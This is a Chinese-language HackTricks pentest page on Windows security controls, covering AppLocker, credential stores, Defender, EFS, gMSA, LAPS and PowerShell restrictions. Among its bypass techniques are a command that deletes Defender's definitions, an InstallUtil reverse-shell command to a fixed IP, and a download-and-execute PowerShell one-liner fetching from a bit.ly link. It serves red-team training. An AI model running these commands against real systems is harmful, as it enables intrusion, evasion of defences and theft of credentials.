| .. | ||
| README.md | ||
| uac-user-account-control.md | ||
Windows安全控制
从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家)!
支持HackTricks的其他方式:
- 如果您想看到您的公司在HackTricks中做广告或下载PDF格式的HackTricks,请查看订阅计划!
- 获取官方PEASS & HackTricks周边产品
- 探索PEASS家族,我们的独家NFTs
- 加入 💬 Discord群组 或 电报群组 或 关注我们的Twitter 🐦 @carlospolopm。
- 通过向HackTricks和HackTricks Cloud github仓库提交PR来分享您的黑客技巧。
使用Trickest可以轻松构建和自动化工作流程,并由全球最先进的社区工具提供支持。
立即获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
AppLocker策略
应用程序白名单是一份批准的软件应用程序或可在系统上存在和运行的可执行文件列表。其目标是保护环境免受有害恶意软件和与组织特定业务需求不符的未经批准的软件。
AppLocker是微软的应用程序白名单解决方案,让系统管理员控制用户可以运行哪些应用程序和文件。它提供对可执行文件、脚本、Windows安装程序文件、DLL、打包应用和打包应用安装程序的细粒度控制。
组织通常会阻止cmd.exe和PowerShell.exe以及对某些目录的写访问,但这些都可以被绕过。
检查
检查哪些文件/扩展名被列入黑名单/白名单:
Get-ApplockerPolicy -Effective -xml
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
$a = Get-ApplockerPolicy -effective
$a.rulecollections
这个注册表路径包含了AppLocker应用的配置和策略,提供了一种查看系统上当前生效规则集的方式:
HKLM\Software\Policies\Microsoft\Windows\SrpV2
绕过
- 用于绕过AppLocker策略的有用可写文件夹:如果AppLocker允许在
C:\Windows\System32或C:\Windows中执行任何操作,那么有可写文件夹可用于绕过此限制。
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\windows\tracing
- 通常受信任的"LOLBAS's"二进制文件也可以用来绕过AppLocker。
- 编写不良的规则也可能被绕过
- 例如,
<FilePathCondition Path="%OSDRIVE%*\allowed*"/>,您可以在任何地方创建一个名为allowed的文件夹,它将被允许。 - 组织通常也会专注于阻止
%System32%\WindowsPowerShell\v1.0\powershell.exe可执行文件,但忽略了其他PowerShell可执行文件位置 ,如%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe或PowerShell_ISE.exe。 - DLL强制执行很少启用,因为它可能对系统造成额外负担,并且需要大量测试以确保不会出现故障。因此,使用DLL作为后门将有助于绕过AppLocker。
- 您可以使用ReflectivePick或SharpPick在任何进程中执行Powershell代码并绕过AppLocker。有关更多信息,请查看:https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode。
凭据存储
安全帐户管理器(SAM)
本地凭据存在于此文件中,密码已经被哈希。
本地安全机构(LSA)- LSASS
凭据(哈希)被保存在此子系统的内存中,用于单点登录。
LSA管理本地安全策略(密码策略,用户权限...),身份验证,访问令牌...
LSA将检查提供的凭据是否在SAM文件中(用于本地登录),并与域控制器通信以验证域用户。
凭据被保存在LSASS进程中:Kerberos票据,哈希NT和LM,易于解密的密码。
LSA秘密
LSA可能会在磁盘中保存一些凭据:
- Active Directory计算机帐户的密码(无法访问的域控制器)。
- Windows服务帐户的密码
- 计划任务的密码
- 更多(IIS应用程序的密码...)
NTDS.dit
这是Active Directory的数据库。仅存在于域控制器中。
防御者
Microsoft Defender是Windows 10和Windows 11中可用的防病毒软件,以及Windows Server版本。它阻止常见的渗透测试工具,如**WinPEAS。但是,有方法可以绕过这些保护**。
检查
要检查Defender的状态,您可以执行PS cmdlet Get-MpComputerStatus(检查**RealTimeProtectionEnabled**的值以了解是否已激活):
PS C:\> Get-MpComputerStatus
[...]
AntispywareEnabled : True
AntispywareSignatureAge : 1
AntispywareSignatureLastUpdated : 12/6/2021 10:14:23 AM
AntispywareSignatureVersion : 1.323.392.0
AntivirusEnabled : True
[...]
NISEnabled : False
NISEngineVersion : 0.0.0.0
[...]
RealTimeProtectionEnabled : True
RealTimeScanDirection : 0
PSComputerName :
您也可以运行以下内容进行枚举:
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
wmic /namespace:\\root\securitycenter2 path antivirusproduct
sc query windefend
#Delete all rules of Defender (useful for machines without internet access)
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
加密文件系统(EFS)
EFS通过加密来保护文件,利用称为文件加密密钥(FEK)的对称密钥。该密钥使用用户的公钥加密,并存储在加密文件的$EFS 备用数据流中。需要解密时,用户的数字证书对应的私钥用于从$EFS流中解密FEK。更多详细信息可在这里找到。
无需用户启动的解密场景包括:
- 当文件或文件夹移动到非EFS文件系统(如FAT32)时,它们会自动解密。
- 通过SMB/CIFS协议发送的加密文件在传输之前会被解密。
这种加密方法允许所有者透明访问加密文件。然而,仅仅更改所有者的密码并登录将不允许解密。
要点:
- EFS使用对称FEK,使用用户的公钥加密。
- 解密使用用户的私钥访问FEK。
- 在特定条件下会自动解密,如复制到FAT32或网络传输。
- 加密文件对所有者可访问,无需额外步骤。
检查EFS信息
检查用户是否使用了此服务,检查路径是否存在:C:\users\<username>\appdata\roaming\Microsoft\Protect
使用cipher /c \<file\>检查文件的访问权限。您还可以在文件夹中使用cipher /e和cipher /d来加密和解密所有文件。
解密EFS文件
成为权限系统
这种方式需要受害用户在主机内运行一个进程。如果是这种情况,可以使用meterpreter会话模拟用户进程的令牌(从incognito中的impersonate_token)。或者您可以直接migrate到用户的进程。
知道用户密码
{% embed url="https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files" %}
群组管理服务帐户(gMSA)
微软开发了群组管理服务帐户(gMSA),以简化IT基础设施中服务帐户的管理。与通常启用“密码永不过期”设置的传统服务帐户不同,gMSA提供了更安全和可管理的解决方案:
- 自动密码管理:gMSA使用一个复杂的、240字符的密码,根据域或计算机策略自动更改。这个过程由微软的密钥分发服务(KDC)处理,消除了手动密码更新的需要。
- 增强安全性:这些帐户不会被锁定,也不能用于交互式登录,增强了安全性。
- 多主机支持:gMSA可以在多个主机之间共享,非常适合在多台服务器上运行的服务。
- 定时任务功能:与托管服务帐户不同,gMSA支持运行定时任务。
- 简化的SPN管理:当计算机的sAMaccount详细信息或DNS名称发生变化时,系统会自动更新服务主体名称(SPN),简化了SPN管理。
gMSA的密码存储在LDAP属性_msDS-ManagedPassword_中,并且由域控制器(DC)每30天自动重置一次。这个密码是一个加密的数据块,称为MSDS-MANAGEDPASSWORD_BLOB,只能由授权管理员和安装了gMSA的服务器检索,确保安全环境。要访问这些信息,需要一个安全连接,如LDAPS,或者连接必须经过“密封和安全”认证。
您可以使用GMSAPasswordReader来读取这个密码。
/GMSAPasswordReader --AccountName jkohler
还可以查看有关如何执行NTLM中继攻击以读取 gMSA 密码的网页。
LAPS
本地管理员密码解决方案(LAPS),可从Microsoft下载,可管理本地管理员密码。这些密码是随机的、独特的,并且定期更改,存储在Active Directory中。通过ACL对授权用户进行限制,可以提供读取本地管理员密码的能力。
{% content-ref url="../active-directory-methodology/laps.md" %} laps.md {% endcontent-ref %}
PS 受限语言模式
PowerShell 受限语言模式 限制了许多有效使用PowerShell所需的功能,如阻止COM对象,仅允许批准的.NET类型,基于XAML的工作流程,PowerShell类等。
检查
$ExecutionContext.SessionState.LanguageMode
#Values could be: FullLanguage or ConstrainedLanguage
绕过
#Easy bypass
Powershell -version 2
在当前的Windows中,绕过不起作用,但你可以使用PSByPassCLM。
要编译它,您可能需要 添加引用 -> 浏览 ->浏览 -> 添加 C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\31bf3856ad364e35\System.Management.Automation.dll 并将项目更改为 .Net4.5。
直接绕过:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /U c:\temp\psby.exe
反向 shell:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.13.206 /rport=443 /U c:\temp\psby.exe
您可以使用ReflectivePick或SharpPick来在任何进程中执行Powershell代码并绕过受限模式。有关更多信息,请查看:https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode。
PS执行策略
默认情况下设置为restricted。绕过此策略的主要方法:
1º Just copy and paste inside the interactive PS console
2º Read en Exec
Get-Content .runme.ps1 | PowerShell.exe -noprofile -
3º Read and Exec
Get-Content .runme.ps1 | Invoke-Expression
4º Use other execution policy
PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1
5º Change users execution policy
Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted
6º Change execution policy for this session
Set-ExecutionPolicy Bypass -Scope Process
7º Download and execute:
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')"
8º Use command switch
Powershell -command "Write-Host 'My voice is my passport, verify me.'"
9º Use EncodeCommand
$command = "Write-Host 'My voice is my passport, verify me.'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand
更多内容请查看这里
安全支持提供程序接口(SSPI)
是用于认证用户的 API。
SSPI 将负责找到两台想要通信的机器的适当协议。首选方法是 Kerberos。然后 SSPI 将协商将使用哪种认证协议,这些认证协议称为安全支持提供程序(SSP),以 DLL 的形式位于每台 Windows 机器内,并且两台机器必须支持相同的协议才能通信。
主要 SSP
- Kerberos:首选
- %windir%\Windows\System32\kerberos.dll
- NTLMv1 和 NTLMv2:兼容性原因
- %windir%\Windows\System32\msv1_0.dll
- Digest:Web 服务器和 LDAP,密码以 MD5 哈希的形式
- %windir%\Windows\System32\Wdigest.dll
- Schannel:SSL 和 TLS
- %windir%\Windows\System32\Schannel.dll
- Negotiate:用于协商要使用的协议(Kerberos 或 NTLM,Kerberos 是默认的)
- %windir%\Windows\System32\lsasrv.dll
协商可以提供多种方法或仅一种方法。
UAC - 用户账户控制
用户账户控制(UAC) 是一项功能,可为提升的活动启用同意提示。
{% content-ref url="uac-user-account-control.md" %} uac-user-account-control.md {% endcontent-ref %}
使用 Trickest 可轻松构建和自动化工作流程,由全球最先进的社区工具提供支持。
立即获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
从零开始学习 AWS 黑客技术,成为专家 htARTE(HackTricks AWS 红队专家)!
支持 HackTricks 的其他方式:
- 如果您想在 HackTricks 中看到您的公司广告或下载 PDF 版本的 HackTricks,请查看订阅计划!
- 获取官方 PEASS & HackTricks 商品
- 发现PEASS 家族,我们独家的NFT收藏品
- 加入 💬 Discord 群组 或 电报群组 或在 Twitter 🐦 @carlospolopm** 上关注我们**。
- 通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PR 来分享您的黑客技巧。